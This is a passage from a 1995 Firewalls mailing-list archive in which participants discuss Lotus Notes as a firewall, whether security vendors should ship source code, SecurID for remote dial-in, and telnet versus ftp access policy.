From firewalls-owner Mon May 1 00:08:58 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA25633 for firewalls-outgoing; Sun, 30 Apr 1995 23:55:04 -0700 Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id XAA25628 for ; Sun, 30 Apr 1995 23:55:01 -0700 Message-Id: <199505010655.XAA25628@miles.greatcircle.com> Received: from IBMMAIL.COM by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 2013; Mon, 01 May 95 02:55:11 EDT Date: Mon, 01 May 1995 02:55:10 EDT From: " Phil Daniels DLSPPJ - AMPLN1 " To: keithw@tp.com Cc: firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: LOTUS NOTES Sender: firewalls-owner@GreatCircle.COM Precedence: bulk =========================================================================== >>I am a novice in the firewall arena but hopefully not for long. I thought I >>read somewhere that Lotus Notes can be used to implement a firewall to a >>certain degree. Is this true? If so, can someone point me to possible sources? Keith, What you might have read about is the Compuserve Lotus Notes service. As I recall they "download" newsgroups & possibly mailing lists into Lotus Notes databases which subscribers replicate into their local Notes space. A similar service is offered by WorldCom. I imagine that Compuserve may well position this service as a means via which you can avoid the complexities of firewalls, DMZ's etc, and if you are a big Notes user that could have some truth, BTW I am sending this from Lotus Notes. Phil Daniels --- ] the trick is to rock the boat enough to get AMP Society ] everyone a wet but not so much as to sink the ship. Australia ] -- Sender : Keith Wong, Application Engineer Company: Thru-Put Systems, Inc. Phone : (407) 423-8969 FAX : (407) 423-7021 ---- End of mail text This item has been forwarded from Internet. The SMTP headers from the original item follow: Received: from relay2.UU.NET by ibmmail.COM (IBM VM SMTP V2R3) with TCP; Sun, 30 Apr 95 19:12:57 EDT Sun, 30 Apr 95 19:12:57 EDT Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP id QQyntj24284; Sun, 30 Apr 1995 18:59:44 -0400 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11029 for firewalls-outgoing; Sun, 30 Apr 1995 13:34:43 -0700 Received: from hp710.tp.com ((199.100.159.4)) by miles.greatcircle.com (8.6.9/M iles-950430-1) with SMTP id NAA11024 for ; Sun, 30 A pr 1995 13:34:40 -0700 Message-Id: <199504302034.NAA11024@miles.greatcircle.com> Received: by hp710.tp.com (1.38.193.4/15.6) id AA27284; Sun, 30 Apr 1995 16:33:39 -0500 Mailer: Elm (revision: 70.85) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Author: I5004693 Composed: 01/05/95 09:19 Updated by: Phil Daniels on: 01/05/95 16:16 From firewalls-owner Mon May 1 01:38:50 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA27236 for firewalls-outgoing; Mon, 1 May 1995 01:29:42 -0700 Received: from po.gis.prc.com (po.gis.prc.com [140.188.128.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id BAA27231 for ; Mon, 1 May 1995 01:29:39 -0700 Message-ID: Date: 1 May 1995 04:29:38 -0500 From: "Server #7000007" Subject: Undeliverable Mail X-Mailer: Mail*Link SMTP/MS 3.0.0 Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Unknown Microsoft mail form. Approximate representation follows. Message: Firewalls-Digest V4 #276 Sent: Sun, Apr 30, 1995 4:19 AM To: Harris Tom On Server: PRC Bellevue NE MS Date: Mon, May 1, 1995 4:29 AM Reason: Could not be delivered because the destination Microsoft Mail server could not be found. From firewalls-owner Mon May 1 05:11:32 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA29146 for firewalls-outgoing; Mon, 1 May 1995 05:03:58 -0700 Received: from erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA29141 for ; Mon, 1 May 1995 05:03:54 -0700 Posted-Date: Mon, 1 May 1995 08:04:12 -0400 From: "Bryan D. Boyle" Message-Id: <9505010804.ZM3403@maverick.erenj.com> Date: Mon, 1 May 1995 08:04:12 -0400 In-Reply-To: Christopher Klaus "Re: TRUST US" (Apr 28, 7:50pm) References: <199504282350.TAA24442@shadow.net> X-Phone: (908) 730-3338 X-Saying: Strange problems call for strange solutions. X-Face: "Pd&4kXWsi"3Hc_Y~I-ts24DN$w~Hh)&L-P9DZvE"~_~m),~Y&N_]TUIM*4.r@z$SxVL]}v=+IP>Fuq{zx%{KKj"Kys1Q5{|m*l}:[T;N:/=@5[xOIpR$%skp$f0#6^j\1+ -?l%Yk/+S8Y!3J@{~!Ao4-COV:Ft}{]oZ&1=!@<>UIh2s X-Mailer: Z-Mail (3.2.0 06sep94) To: firewalls@greatcircle.com Subject: Re: TRUST US Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Apr 28, 7:50pm, Christopher Klaus wrote: > > Well, you do not see many companies refusing to use most of the software > packages that do not include source. I guess a lot of people don't mind > mistrusting their software, ie Netscape, Windows and almost any decent word > processor. There is, by no stretch of the imagination, no way Netscape, WinDoze, or any decent word processor could be called a mission critical piece of security software. Nor any way, based on experiences with the various products, that I would use them as a way to run a protection/security/logging platform. We have all been working around problems with Bill Gate$ "releases" not meeting the "vision" since mbasic 4.3 (at least....anyone remember the paper tape release...???) ******rest of message deleted********* -- Bryan D. Boyle |The Moving Finger writes,and having writ, moves on. #include |Nor all your Piety nor Wit can call it back to cancel EMAIL: bdboyle@erenj.com |Half a line, or all your tears wash out a Word of it. --------------http://www.access.digex.net/~bdboyle/index.html--------------- From firewalls-owner Mon May 1 05:39:09 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA29439 for firewalls-outgoing; Mon, 1 May 1995 05:23:11 -0700 Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA29434 for ; Mon, 1 May 1995 05:23:07 -0700 Received: from ds9.lis.cch.com by relay2.UU.NET with SMTP id QQynvl10111; Mon, 1 May 1995 08:23:15 -0400 Received: by ds9.lis.cch.com id AA28045; Mon, 1 May 95 08:21:24 EDT Received: from unknown(165.181.149.10) by ds9.lis.cch.com via smap (V1.3) id sma028043; Mon May 1 08:20:58 1995 Received: by deathstar.lis.cch.com (AIX 3.2/UCB 5.64/4.03) id AA75139; Mon, 1 May 1995 08:23:11 -0400 From: doc@deathstar.lis.cch.com (Matthew J. D'Errico) Message-Id: <9505011223.AA75139@deathstar.lis.cch.com> Subject: Re: LOTUS NOTES To: auampwrv@ibmmail.com (Phil Daniels DLSPPJ - AMPLN1) Date: Mon, 1 May 1995 08:23:11 -0400 (EDT) Cc: keithw@tp.com, firewalls@greatcircle.com In-Reply-To: <199505010655.XAA25628@miles.greatcircle.com> from "Phil Daniels DLSPPJ - AMPLN1" at May 1, 95 02:55:10 am X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1665 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Phil Daniels DLSPPJ - AMPLN1 wrote... > >>I am a novice in the firewall arena but hopefully not for long. I > thought I > >>read somewhere that Lotus Notes can be used to implement a firewall to a > >>certain degree. Is this true? If so, can someone point me to possible > sources? > Keith, > What you might have read about is the Compuserve Lotus Notes service. As > I recall they "download" newsgroups & possibly mailing lists into Lotus > Notes databases which subscribers replicate into their local Notes space. > A similar service is offered by WorldCom. > > I imagine that Compuserve may well position this service as a means via > which you can avoid the complexities of firewalls, DMZ's etc, and if you > are a big Notes user that could have some truth, BTW I am sending this > from Lotus Notes. I think the reference is to Lotus' hype regarding their forthcoming "InterNotes" which will provide not only email gateway, but the ability to browse Web documents using the Notes v4 interface, as well as build Web documents using the Notes document design tools. There's been significant mis-information propagated by Lotus with regard to "Firewall" facilities. I say misinformation because they imply very strongly that InterNotes will act as a firewall for your Internet activities. Outside of the obvious security walls between the Notes facilities and the Internet, there's no proof,nor doumentation, that InterNotes will provide the facilities of a good firewall outside of the Notes realm, i.e.: Bastion Host, Packet Filtering, etc. -- Doc From firewalls-owner Mon May 1 06:09:06 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA29413 for firewalls-outgoing; Mon, 1 May 1995 05:21:11 -0700 Received: from relay2.pipex.net (relay2.pipex.net [158.43.128.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA29408 for ; Mon, 1 May 1995 05:21:06 -0700 Received: from smtpgty.saicuk.co.uk by bath.pipex.net with SMTP (PP); Mon, 1 May 1995 13:21:14 +0100 Received: by smtpgty.saicuk.co.uk with Microsoft Mail id <2FA4DE07@smtpgty.saicuk.co.uk>; Mon, 01 May 95 13:11:35 GMT From: "Johnson-Bryden, Ian" To: "'Firewalls@GreatCircle.COM'" Subject: Re: TRUST US? (Getting Source) Date: Mon, 01 May 95 11:54:00 GMT Message-ID: <2FA4DE07@smtpgty.saicuk.co.uk> Encoding: 134 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk *Shrink Wrap Vendors Therefore the shrink-wrap vendors believe themselves to have final responsibility for security. They don't want to be held responsible for screw-ups by end-user altering their software. They have also innovated and want to earn revenue from their innovations. They have many customers so the needs of individuals customers aren't all that important. They can force some to wait for fixes to various problems and for ports to new os's. Depends on the vendor and on the customer. Very effective security products are available, such as trusted OS and RDBMS, which are not available as source code. However, the products provide users with the capability to make changes through configuration without changing the base product code. Some of these products are highly configurable. That enables the vendor to have the product evaluated and endorsed/certified by an organisation such as NCSC or an ITSEC CLEF, but still leaves the user with the ability and responsibility to produce a custom system solution. *External Consultants Aren't doing much innovation. They are responsible for customization at the site, and need access to some configuration tools. In essence, they value-add other parties packages. They seek the safety of being able to blame the vendor. They are most interested in the two layer (security, config) approach disscussed earlier. That depends on the consultant and the customer brief to the consultant. Many consultants working the Inet market are primarily UNIX specialists and may have very limited experience of risk/security. Some consultants are highly experienced in risk analysis and the development of risk policies which might be confined to IT, or could extend to the complete spectrum of risk analysis including things like personnel policies. In between there are many flavours of risk. Selecting the most appropriate type of consultant can be difficult and some government agencies maintain registers of skills and clearances which are updated through experience to assist departments in making that selection. Although these lists are often restricted, some information be available outside of government. In some cases, a consultant listed in this way may be very good in the government environment but be unfamiliar with the cultures outside. Very often a consultant is prevented from being innovative because of the way in which the client has drafted the brief. For example, the client may have decided to buy a particular type of 'firewall' product and the consultant's brief is simply to support or carry out the implementation within those constraints. If the client draws a multi-part requirement which calls for the consultant to analyse corporate risks and recommend options, starting with a full corporate assessment and then progressing through a series of elements against specific milestones, the consultant could be very innovative and effective. *Internal IS Knows that the real responsibility lies with them. They are incredibly concerned about each detail of the software on their system. They are doing the maintenance and know that their head is on the block if things break. They feel the need to know everything that is going on and they need to have bug fixes yesterday. It is Internal IS that most wants source. The corporate user should always accept resonsibility at least in a strategic and executive sense. That doesnt necessarily mean that the user needs access to product at every level. If a government agency is buying a truck they may spend many man months investigating the vendor and examining every part of his production and quality management systems. Before an order is placed rain forests of documentation will be produced and specify right down to the paint number and the temperature at which it is applied. They may insist on inspecting each stage of production from raw material. A commercial organisation usually looks at a range of competive products, maybe takes a test drive, but accepts that the truck manufacturer knows more than they do about how the materials are processed and assembled and they simply cant justify the time and cost of closely supervising vendor and product. The other aspect to this is legal liabilities. If the customer takes delivery of the truck and then decides to make changes to its structure without the experience built up by the vendor, all sorts of horrible complications can follow. Given these needs how about a component solution: Software vendors: Rather than packaging monolithic tools, vendors distribute small testable pieces. They can show that each of these pieces works and can therefore avoid some blame for end-user configuration problems. That already happens and is one of the principles behind security criteria. Each building block is evaluated and ticketed at the appropriate level. However, that does not mean that the use of, say, B1 components to build a system results in the system being B1. To complete the picture it is necessary to run accreditation and to examin not only the IT hardware and software, but also all the other factors such as personnel selection, mandated procedures etc. Security Consultants are responsible for integrating the pieces (knowing that each is secure). Security consultants are responsible for keeping up with news relating to all security products and keeping their clients informed. That depends on what the consultants brief is. It could be that several different consultants are employed at each stage of the process from risk analysis to system implementation. They may also be engaged to carry out audits after implementation to ensure that the risk management policy still meets reality and needs and that the policy is being enforced. One problem which can surface is that a consultant concentrates on a niche and, although very good and current in that area, may not know about a development outside the niche which makes existing approaches obsolete. Internal IS: Gets pieces they know work (thanks to the vendor), in an observable and (hopefully)reliable configuration thanks to the consultant. The Internal IS and swap individual pieces as necessary because the pieces are functionally easy to understand. They get updates about problems and prospective fixes. Since the pieces are easy to understand, the consultants can replace them with other pieces as bugs are discovered. There are vendors who already provide products and services of this type. One approach which has also been employed for many years is the issue of media without detailing the reasons for the change. Whether this is desirable or undesirable, the reason was that it avoided the identification of security weaknesses which could be exploited by an attacker and was a customer requirement rather than something promoted by any vendors. It was intended to protect those users who were slow to execute bug fixes for whatever reason and would otherwise have presented a window of opportunity should an attacker act faster. Every user has to take a view on this, but it is one potential risk of bug discussion on public BBSs where an attacker may be faster to use the information of a vulnerability than the victims are in acting on the information. One possible risk is that the attack is carried out by an unhappy member of the IS team before security walks him out the door for some other reason and before anyone else has plugged the hole. How you view that depends on your knowledge of company morale and how paranoid you happen to be. It can also be an argument against holding source in that an employee could make changes to the security system which allow him to attack after he has left the company and for that attack to avoid the audit trail. Ian J-B From firewalls-owner Mon May 1 06:38:12 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA29997 for firewalls-outgoing; Mon, 1 May 1995 05:52:56 -0700 Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA29992 for ; Mon, 1 May 1995 05:52:53 -0700 Received: from trevor ([13.252.80.2]) by alpha.xerox.com with SMTP id <14510(3)>; Mon, 1 May 1995 05:53:06 PDT Received: from Galaxy (galaxy.henr.mc.xerox.com) by trevor (4.1/SMI-4.1) id AA02969; Mon, 1 May 95 08:53:01 EDT Date: Mon, 1 May 1995 05:53:01 PDT From: joep@ia.mc.xerox.com (Joe Pennell) Message-Id: <9505011253.AA02969@trevor> To: woods@ncar.ucar.edu Subject: Re: Secure Modem Pool Cc: Firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Let me rephrase my original comments to avoid confusion. The menu-driven admin may be a pain, but the feature that I particularly like is the pinpoint control on access. Prior to installing the SecureID, we had been using a password protection mechanism on a terminal server. When a notice of termination came flying across the desk at 4:30 on a Friday, we had to change the password, and notify all remote users so that those with weekend operations could function. Talk about a royal pain. It turned out to be a trade-off, but one that we didn`t mind too much. It all goes back to how many remote users you have, and how remote they are. The other comment you noted, the one about the PIN, I made an vague comment, sorry. Yes, you do need the password on the front of the card in addition to your PIN. My point was that the requirement for a unique PIN was annoying. As your system starts to "fill up" new users encounter more errors as they try to choose a number that is left. I am not particularly fond of anyone knowing what a legal PIN number is, even though they don't know who has the card. As far as the TRUST US war, everyone on this list would probably LOVE to have the time to sit down and develop their own security from scratch. Reality says that sometimes we can, and sometimes we have to rely on others. The trick is to find help that you think you can trust, because you may not have time to sit down and review everything for yourself. joep@ia.mc.xerox.com From firewalls-owner Mon May 1 07:17:20 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA00992 for firewalls-outgoing; Mon, 1 May 1995 06:46:51 -0700 Received: from brimstone.soscorp.com (soscorp.soscorp.com [204.52.248.130]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA00986 for ; Mon, 1 May 1995 06:46:47 -0700 Received: from fearless.soscorp.com (fearless.soscorp.com [204.52.249.130]) by brimstone.soscorp.com ($Revision: 2.8 $/8.6.12/8.6.4.287) with BSMTP id BS0020687/JAA20691; Mon, 1 May 1995 09:42:01 -0400 Received: from dauntless.soscorp.com (dauntless.soscorp.com [204.52.249.141]) by fearless.soscorp.com (8.6.10/8.6.4.287) with ESMTP id JAA14465; Mon, 1 May 1995 09:41:19 -0400 From: ari@soscorp.com (Ari Shamash) Received: by dauntless.soscorp.com (8.6.10/SMI-4.1) id JAA25661; Mon, 1 May 1995 09:41:16 -0400 Date: Mon, 1 May 1995 09:41:16 -0400 Message-Id: <199505011341.JAA25661@dauntless.soscorp.com> To: Abraham Lui Cc: firewalls@GreatCircle.COM Subject: Telnet and Ftp In-Reply-To: <199504281933.AA263327628@hpindda.cup.hp.com> References: <199504281933.AA263327628@hpindda.cup.hp.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>>>> On Fri, 28 Apr 1995 12:33:47 -0700, Abraham Lui said: Abraham> A while back Marcus Ranum had circulated in this Abraham> mailing list on how to transfer a file through a Abraham> remote login session (eg. rlogin or telnet). I am Abraham> surprise to see that some firewall products out there Abraham> still provide seperate access control on telnet and Abraham> ftp. Using Marcus's technique, denying ftp but Abraham> allowing telnet does not make any sense! By that token, you can FTP a file via email. Does that mean that FTP access should be tied to email access? Or better yet, you can run PPP on top of email (no flames please, it is technically possible, if not practical). Does that mean that SLIP/PPP access and email access should be tied together as well? Once you allow data in any form to cross your firewall, you inevitably allow many forms of access through your firewall, but with varying degrees of difficulty. IMHO, it takes a certain amount of sophistication on the users part to run PPP over email, whereas it doesn't take much to run Fetch on a Mac and bring files over. The bottom line is: What security policy are you trying to implement? How are you protecting against? That has to be answered before a solution can be found. Ari Shamash SOS Corporation From firewalls-owner Mon May 1 07:46:26 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA01735 for firewalls-outgoing; Mon, 1 May 1995 07:12:19 -0700 Received: from lmux02.ssc.siemens.com (ssc.siemens.com [192.132.51.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA01730 for ; Mon, 1 May 1995 07:12:01 -0700 Received: by lmux02.ssc.siemens.com (5.65/Ultrix3.0-C) id AA07717; Mon, 1 May 1995 10:14:29 -0400 Date: Mon, 1 May 1995 10:14:28 -0400 (EDT) From: Kent Wiggins Subject: Re: Lotus Notes for a firewall? To: "Keith L. Wong" Cc: Fire Walls In-Reply-To: <199504302034.NAA11024@miles.greatcircle.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There is a document called the Lotus Notes Interface Cookbook which I got from our Notes guru here. It is dated Feb 8th, so the info might be a little old. In it, it says you can get a copy at: ftp://ftp.notes.net/pub/faq/notesfaq.txt (text) -or- ftp://ftp.notes.net/pub/faq/notesfaq.nsf (notes format, I think) http://www.notes.net In section 11.0, they tell you how to use Notes through an existing firewall. Option one is to get your security administrator to allow TCP/IP port 1352 through your router. Option 2, "for the more technically inclined ...", recommends using the plugboard proxy from TIS (gee, what a concept :-). In section 11.1, they tell you how set up Notes as its own firewall. Option one is a dual-homed (meaning it has two ethernet cards) configuration. After telling you how to do it, they then tell you, and I quote, "..., we do not recommend it because it because it relies on how well the underlying operating system is configured, tested, and maintained." Option two has the Notes server on an isolated LAN, using a serial connection back to the inside to replicate the databases. They recommend this method. /=======================================================================\ | Kent Wiggins | Voice: (407)942-5148 | | Pricipal Systems Programmer | Fax: (407)942-6874 | | Siemens Stromberg-Carlson | work: okw@ssc.siemens.com | | Lake Mary, Florida | private: wiggins@magicnet.net | \=======================================================================/ On Sun, 30 Apr 1995, Keith L. Wong wrote: > Hi, > > I am a novice in the firewall arena but hopefully not for long. I thought I read > somewhere that Lotus Notes can be used to implement a firewall to a certain > degree. Is this true? If so, can someone point me to possible sources? > > Thanks much, > Keith > > -- > Sender : Keith Wong, Application Engineer > Company: Thru-Put Systems, Inc. > Phone : (407) 423-8969 > FAX : (407) 423-7021 > From firewalls-owner Mon May 1 08:03:37 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA01297 for firewalls-outgoing; Mon, 1 May 1995 06:55:52 -0700 Received: from inet-gw-1.pa.dec.com (inet-gw-1.pa.dec.com [16.1.0.22]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA01292 for ; Mon, 1 May 1995 06:55:49 -0700 Received: from vbv03.vbv.dec.com by inet-gw-1.pa.dec.com (5.65/24Feb95) id AA18871; Mon, 1 May 95 06:50:30 -0700 Received: by vbv03.vbv.dec.com (5.65/MS-012594); id AA02028; Mon, 1 May 1995 09:50:28 -0400 Message-Id: <9505011350.AA02028@vbv03.vbv.dec.com> To: firewalls@greatcircle.com Subject: Re: Source Code In-Reply-To: Your message of "Sun, 30 Apr 95 03:34:17 EDT." Date: Mon, 01 May 95 09:50:27 -0400 From: "Frank Byrum" X-Mts: smtp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It was written: >The major use I have for source code is adding minor new functions and >altering old functions to provide different logging, slightly different >functionality, adaption to a changing environment, etc. > >I think that source code is far more common and necessary in an >environment without captive vendors. For example, Windows source is >essentially unnecessary because Microsoft monopolizes the market. If >source was out there, it wouldn't help because they would change it all >in the next generation to keep the vendors in line. IBM mainframe >source is similarly closely held in much the same way, and it is not >really an impediment to mainframe operations. > >In the Unix environment, source is needed because there are so many >different development lines that compiling everything for every version >is very expensive. Since there is no dominant market force, vendors >cannot force you to take their software, and source code provides the >only means of doing maintenence on many of the development lines. I run >a bunch of obscure Unix packages that I have run for 15+ years, >compiling them for 3B2s, Suns, Interactive Unix, FreeBSD, and SCO Unix >at various times, and porting them as OS versions came out with other >advantages. > >Source code is far more useful in performing security-related and >systems administration functions than in many other fields. For >example, adding special logging to most applications is done in the user >code, while adding logging to a network interface for security purposes >is an OS modification that cannot be done at the user code level. About >7 years ago, I modified a version of the Unix shell to add integrity >features - impossible to do practically without the source, but >something a normal user would never need or wish to do. I made a >special version of the Find command for some reason or another, again an >important change for systems administration, but not the sort of thing a >user would ever need to do. > >In other words, normal users don't do many things that require source >code, while systems admins and info-sec experts do. That's why we want >source code all the time, and those users don't get it. I find the fact that people want to modify source code interesting. I might be able to forgive changing code for logging or adding additional logging, but the fact does remain that this code is used to secure a site. And even if you read the code and think that you understand the code and have considered the codes interaction with other subsystem--you could still introduce a new bug. (This is not saying that the code writes might not do the same--but they are responsible for their work). But this does propose a problem, what if the designers redesign the security code, what do you do then? Who is responsible if your change causes a security problem? Or better yet, what if your changes have some ripple effect to some other subsystem and an issue that was not a problem before now becomes a security hole. Trying to support changes like this can become a real problem. I have seen many people who try to modify code of this nature and make a real mess of things. Mostly because their understanding was not complete. Even though we include source code with our distribution, I would not suggest that anyone make changes. It gets real hard to try to support a product and changes as well. I can not guarantee that any changes that are made will work in the next version. And we really don't have the time to debug people's code. If there are changes needed, I would rather have that information placed in the engineering process so we can include the functionality in the next release. That way there is true support for the change and if there are problems we can deal with them. Frank From firewalls-owner Mon May 1 08:12:14 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA01850 for firewalls-outgoing; Mon, 1 May 1995 07:20:51 -0700 Received: from gateway.damark.com (GATEWAY.DAMARK.COM [204.17.145.230]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA01845 for ; Mon, 1 May 1995 07:20:46 -0700 Received: by gateway.damark.com; id JAA13946; Mon, 1 May 1995 09:18:37 -0500 Received: from sco.damark.com(172.31.254.231) by gateway.damark.com via smap (V1.3) id sma013944; Mon May 1 09:18:23 1995 Received: by damark.com (5.65/1.2-eef) id AA14723; Mon, 1 May 95 09:19:17 -0500 Message-Id: <9505011419.AA14723@damark.com> From: "william.wells" To: FIREWALLS Subject: FW: TRUST US Date: Mon, 01 May 95 09:14:00 PDT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is a composite response to several threads floating around. The "treads" are samples of common thoughts. Thread 1: > The problem no one mentions is that firewalling is a business now which > means we have to support our products, and if someone takes the code and > makes fundamental changes in the product leading to a failure it damages the > reputation of the product and our company. Plus how could we be expected to > support a product when we don't know what changes to the code the customer > has made? yeah! Just look at how much damage was done to the Unix marketplace because of source availability. Thread 2: > how seriously they takes them. Sun is getting better. HP is a good > counter example where the company doesn't provide src and you do > not hear many people complaining HPUX being so insecure, even tho the > occasional vulnerability appears from time to time. HPUX? The system that in 1994 ships with a /bin/sh that is Svr2 vintage (well has all the bugs that Svr2's sh had), that has default tty edit chars that assume we all still use real ttys (I mean teletypes), the system that ships a diff that does not know -c ... Thread 3: I think that source code is far more common and necessary in an environment without captive vendors. For example, Windows source is essentially unnecessary because Microsoft monopolizes the market. If source was out there, it wouldn't help because they would change it all in the next generation to keep the vendors in line. IBM mainframe source is similarly closely held in much the same way, and it is not really an impediment to mainframe operations. My comments- It seems to me that the real problem here is that Unix doesn't have a central clearing house for official source and that vendors are competing for market share so are trying to add their "we're better than everyone else" features. In other mail, people are saying "I have this new program which is better than xxxx". In the commercial world, especially if source was properly managed, the change would be submitted to the official source team who would review its merits and incorporate it into the official release. So, instead of having many special versions of things, you have 1 which is official. From my listening, it appears that 'sendmail' works this way. There is a version which is "official". Sites can twist it anyway they choose but there is still an official release. (Where is that 'src' anyway?) As for "we're better" syndrome, I have no way of knowing if the sendmail I get with HP/UX has any relationship with the latest version on the Internet. A month back, I asked about how to enable the 'round- robin' feature of DNS, since HP appears to have their own version of everything and they don't tie it into the 'src' version, I still don't know if I can "turn it on". Source would immediately (relatively speaking) answer those questions. The other reason for having source is that it allows you to "see" the hidden features of the systems. "Rumor" has it that Microsoft has hidden features in Windows which their software exploits to the disadvantage of third-party developers. I've called DEC on problems and they say, "run this undocumented program" or "set this undocumented parameter". I've been on some systems where there was an undocumented and unlogged system ID for allowing the vendor to dial-in an check (this hasn't happened for a while- I hope). At previous jobs, we routinely reassembled the systems from source. Occasionally, we'd hit a program where our binary and the released binary didn't jive: some "test" code wasn't removed or some "quick fix" added. I don't mind having "vendor special" code in my systems, I mind terribly not knowing about them. It scares me when I mistype a command and get a response of "xxxxx completed". So, how does this relate to firewalls- my final reason for source. It allows us to add site specific security checks which I don't expect the vendor to add. For example, we have some internal eMail addresses which we do not want accessible from outside. The easiest way to handle was to add a filter at the most logical point; the single point where all eMail passes. We also have a problem with case-sensitivity with eMail- again, a simple tweak. One of the ways to handle security is to add special 'trips'; this can be done in a variety of ways- source is one. From firewalls-owner Mon May 1 08:55:41 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA03426 for firewalls-outgoing; Mon, 1 May 1995 08:33:12 -0700 Received: from lmux02.ssc.siemens.com (ssc.siemens.com [192.132.51.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA03421 for ; Mon, 1 May 1995 08:33:08 -0700 Received: by lmux02.ssc.siemens.com (5.65/Ultrix3.0-C) id AA08242; Mon, 1 May 1995 11:35:35 -0400 Date: Mon, 1 May 1995 11:35:34 -0400 (EDT) From: Kent Wiggins Subject: Re: Lotus Notes for a firewall? - Oops, typo! To: keithw@tp.com Cc: firewalls@greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Just realized I made a typo in my previous post. The document's name is Lotus Notes InterNET Cookbook, not Lotus Notes InterFACE Cookbook. Sorry about that. /=======================================================================\ | Kent Wiggins | Voice: (407)942-5148 | | Pricipal Systems Programmer | Fax: (407)942-6874 | | Siemens Stromberg-Carlson | work: okw@ssc.siemens.com | | Lake Mary, Florida | private: wiggins@magicnet.net | \=======================================================================/ From firewalls-owner Mon May 1 10:10:41 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA03362 for firewalls-outgoing; Mon, 1 May 1995 08:26:43 -0700 Received: from maily1.prodigy.com (maily1.prodigy.com [192.207.105.55]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA03357 for ; Mon, 1 May 1995 08:26:40 -0700 Received: (from frank@localhost) by maily1.prodigy.com (8.6.10/8.6.9) id LAA23477; Mon, 1 May 1995 11:53:06 -0400 Date: Mon, 1 May 1995 11:53:06 -0400 (EDT) From: Frank Wortner To: ted@gw.lsli.com cc: firewalls@GreatCircle.COM Subject: RE: TRUST US and other hooui In-Reply-To: Message-ID: X-Mail-1: Prodigy Services Co. X-Mail-2: 1565 Front Street X-Mail-3: Yorktown Heights NY 10598 X-Phone: 1-914-448-1740 X-FAX: 1-914-448-1946 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 28 Apr 1995 ted@gw.lsli.com wrote: > > If a client is willing to sign some > non-disclosure agreements, we are willing to allow them to examine the code. A commendable and not at all unreasonable stance. In fact, an offer to review design specifications and the controls implemented to make sure that the product meets thost specs might be even more useful and interesting. > ... how could we be expected to support a product when we don't know > what changes to the code the customer has made? A problem, but one that is hardly unique to your product, or in fact to the computer industry. For example, automobile owners often modify cars and add or change numerous accessories, and dealers and mechanics manage to survive. The main difference seems to be the intangible nature of software versus other products --- it's easy to see the aftermarket stereo in a car, but harder to notice the rebuilt RPC library. Unless a software system is *SO* difficult to modify that it is not worth the effort of doing so, I doubt that customers will ever be detered in their attempts both to "improve" a product or tailor it to their particular needs. Vendors will just have to live with that possibility. Don't get me wrong: I'm not suggesting that vendors should be required to support unauthorized modifications anymore than I would expect a car dealer to repair under warrantee a non-dealer or non-factory option. Maybe I'm just a bit unique, but I'm willing to live with the consequences of what *I* do. Frank -- "Outside of a dog, a book is a man's best friend; inside of a dog, it's too dark to read." -- Groucho Marx From firewalls-owner Mon May 1 10:12:56 1995 Received: (daemon@localhost) by miles.greatcircle.com 